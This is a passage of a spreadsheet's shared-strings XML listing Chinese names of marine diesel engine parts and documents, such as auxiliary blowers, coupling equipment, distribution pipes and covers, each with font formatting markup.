      <t>废气用不锈钢管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废热回收锅炉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废油盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废油盘安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分程隔板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分段起吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分段组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分隔板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离联轴器环机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离联轴器设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离联轴器设备安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离联轴器设备分叉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离联轴器设备螺柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离联轴器设备十字臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离联轴器设备停止</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离联轴器设备支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离器的吸入管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离器吸入管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离式齿缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离式推力轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配管，前部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配管进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配管支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底脚</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配器垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配器起动空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分配轴箱支承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分体机架焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分体套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分油机流量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单独温度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-PH</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分支管，内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分支管，外螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风机</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风机开关箱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇配件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>封闭式密封环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蜂鸣抑制边缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氟橡胶密封圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>浮动块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>浮力阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>符号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>符号</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-? 23</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>符号</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>黄铜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>符号</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅机容量清单</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助触点</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助工具安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机电气板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机电子原理图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机管路布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机控制箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机容量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机文字说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助链驱动</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷变动装置的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机发电机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推进</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷程序装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷控制箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷控制要求</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负荷依赖冷却水系统</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>负载指示器布置</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附加备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附加工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附加控制装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附加维修包</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附属装置支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复位弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>腹板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>腹板总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>覆盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖，滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖把手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖和安全阀安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖用垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>概述</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
